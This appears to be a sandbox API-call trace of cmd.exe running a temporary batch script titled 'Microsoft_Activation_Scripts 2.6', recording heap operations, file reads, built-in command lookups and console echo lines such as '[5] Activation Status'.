[0180.927] GetProcessHeap () returned 0x19a8f1e0000 [0180.928] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.928] GetProcessHeap () returned 0x19a8f1e0000 [0180.928] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200030) returned 1 [0180.928] GetProcessHeap () returned 0x19a8f1e0000 [0180.929] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f202060) returned 1 [0180.929] GetProcessHeap () returned 0x19a8f1e0000 [0180.929] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.929] GetProcessHeap () returned 0x19a8f1e0000 [0180.929] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0180.930] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.930] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25b7 [0180.930] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.930] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9731, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2603 [0180.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: __________________________________________________ \r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: __________________________________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 76 [0180.930] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.930] GetFileType (hFile=0xa0) returned 0x1 [0180.930] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.930] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2603 [0180.930] GetProcessHeap () returned 0x19a8f1e0000 [0180.930] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.930] GetProcessHeap () returned 0x19a8f1e0000 [0180.931] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.931] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.931] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.932] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.932] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.932] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.932] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.932] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.932] GetProcessHeap () returned 0x19a8f1e0000 [0180.932] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0180.932] GetProcessHeap () returned 0x19a8f1e0000 [0180.932] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.932] GetProcessHeap () returned 0x19a8f1e0000 [0180.932] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f1ffe20 [0180.932] _tell (_FileHandle=3) returned 9731 [0180.932] _close (_FileHandle=3) returned 0 [0180.932] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.932] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.932] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.932] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.932] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.932] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.933] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.933] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.933] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.933] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.933] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.933] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.933] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.933] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.933] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.933] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.933] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.933] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.933] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.933] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.933] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.933] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.933] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.933] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.933] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.933] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.933] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.933] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.933] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.933] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.933] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.934] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.934] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.934] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.934] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.934] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.934] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.934] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.934] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.934] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.934] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.934] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.934] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.934] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.934] GetLastError () returned 0x7b [0180.934] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.935] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.935] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.935] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.935] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.935] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.935] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.935] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.935] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.935] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.935] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.935] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.935] GetProcessHeap () returned 0x19a8f1e0000 [0180.935] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa6) returned 0x19a8f200190 [0180.935] GetProcessHeap () returned 0x19a8f1e0000 [0180.935] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12c) returned 0x19a8f1ea8b0 [0180.936] GetProcessHeap () returned 0x19a8f1e0000 [0180.936] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x7c) returned 0x19a8f1ea8b0 [0180.936] GetProcessHeap () returned 0x19a8f1e0000 [0180.936] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x7c [0180.936] GetProcessHeap () returned 0x19a8f1e0000 [0180.936] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa8) returned 0x19a8f2002f0 [0180.936] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" __________________________________________________ \r\n") returned 71 [0180.936] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.936] GetFileType (hFile=0x24) returned 0x2 [0180.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.936] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.936] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.936] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x47) returned 1 [0180.941] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.941] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.941] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.941] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.942] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.942] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.942] SetConsoleInputExeNameW () returned 0x1 [0180.942] GetConsoleOutputCP () returned 0x1b5 [0180.942] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.943] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.943] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.943] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.943] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.943] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9731, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2603 [0180.943] GetProcessHeap () returned 0x19a8f1e0000 [0180.944] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2002f0) returned 1 [0180.944] GetProcessHeap () returned 0x19a8f1e0000 [0180.945] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.945] GetProcessHeap () returned 0x19a8f1e0000 [0180.946] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200190) returned 1 [0180.946] GetProcessHeap () returned 0x19a8f1e0000 [0180.947] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffe20) returned 1 [0180.947] GetProcessHeap () returned 0x19a8f1e0000 [0180.947] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.947] GetProcessHeap () returned 0x19a8f1e0000 [0180.948] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0180.948] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.948] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2603 [0180.948] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.949] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9738, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x260a [0180.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n __________________________________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.949] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.949] GetFileType (hFile=0xa0) returned 0x1 [0180.949] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.949] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x260a [0180.949] GetProcessHeap () returned 0x19a8f1e0000 [0180.949] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.949] GetProcessHeap () returned 0x19a8f1e0000 [0180.950] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.951] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.951] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.951] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.951] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.951] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.951] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.951] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.951] GetProcessHeap () returned 0x19a8f1e0000 [0180.951] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0180.951] GetProcessHeap () returned 0x19a8f1e0000 [0180.951] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0180.951] _tell (_FileHandle=3) returned 9738 [0180.951] _close (_FileHandle=3) returned 0 [0180.951] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.951] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.952] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.952] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.952] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.952] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.952] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.952] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.952] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.952] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.952] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.952] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.952] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.952] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.952] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.952] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.952] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.952] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.952] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.952] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.952] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.952] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.952] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.952] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.952] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.952] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.952] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.953] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.953] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.953] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.953] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.953] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.953] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.953] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.953] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.953] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.953] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.953] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.953] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.953] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.953] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.953] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.953] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.953] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.953] GetLastError () returned 0x7b [0180.953] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.954] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.954] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.954] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.954] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.954] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.954] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.954] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.954] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.954] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.954] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.954] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.955] GetProcessHeap () returned 0x19a8f1e0000 [0180.955] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.955] GetProcessHeap () returned 0x19a8f1e0000 [0180.955] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecce0 [0180.955] GetProcessHeap () returned 0x19a8f1e0000 [0180.955] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ecce0, Size=0x16) returned 0x19a8f1ec9a0 [0180.955] GetProcessHeap () returned 0x19a8f1e0000 [0180.955] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec9a0) returned 0x16 [0180.955] GetProcessHeap () returned 0x19a8f1e0000 [0180.955] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb6e0 [0180.955] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.955] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.955] GetFileType (hFile=0x24) returned 0x2 [0180.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.955] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.956] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.956] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.959] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.959] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.959] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.959] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.960] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.960] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.960] SetConsoleInputExeNameW () returned 0x1 [0180.960] GetConsoleOutputCP () returned 0x1b5 [0180.960] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.960] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.961] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.961] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.961] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.961] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9738, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x260a [0180.961] GetProcessHeap () returned 0x19a8f1e0000 [0180.961] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.961] GetProcessHeap () returned 0x19a8f1e0000 [0180.961] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9a0) returned 1 [0180.961] GetProcessHeap () returned 0x19a8f1e0000 [0180.961] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.961] GetProcessHeap () returned 0x19a8f1e0000 [0180.961] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.961] GetProcessHeap () returned 0x19a8f1e0000 [0180.962] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0180.962] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.962] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x260a [0180.962] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.962] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9779, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2633 [0180.962] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [5] Activation Status\r\n", cbMultiByte=41, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [5] Activation Status\r\n___________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 41 [0180.962] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.962] GetFileType (hFile=0xa0) returned 0x1 [0180.962] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.962] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2633 [0180.963] GetProcessHeap () returned 0x19a8f1e0000 [0180.963] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.963] GetProcessHeap () returned 0x19a8f1e0000 [0180.964] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.964] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.965] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.965] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.965] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.965] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.965] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.965] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.965] GetProcessHeap () returned 0x19a8f1e0000 [0180.965] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0180.965] GetProcessHeap () returned 0x19a8f1e0000 [0180.965] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0180.965] GetProcessHeap () returned 0x19a8f1e0000 [0180.965] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f8ac0 [0180.965] _tell (_FileHandle=3) returned 9779 [0180.965] _close (_FileHandle=3) returned 0 [0180.965] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.965] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.965] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.965] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.965] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.965] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.966] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.966] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.966] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.966] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.966] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.966] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.966] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.966] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.966] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.966] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.966] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.966] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.966] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.966] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.966] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.966] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.966] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.966] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.966] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.966] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.966] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.966] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.966] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.966] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.966] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.966] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.967] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.967] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.967] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.967] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.967] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.967] 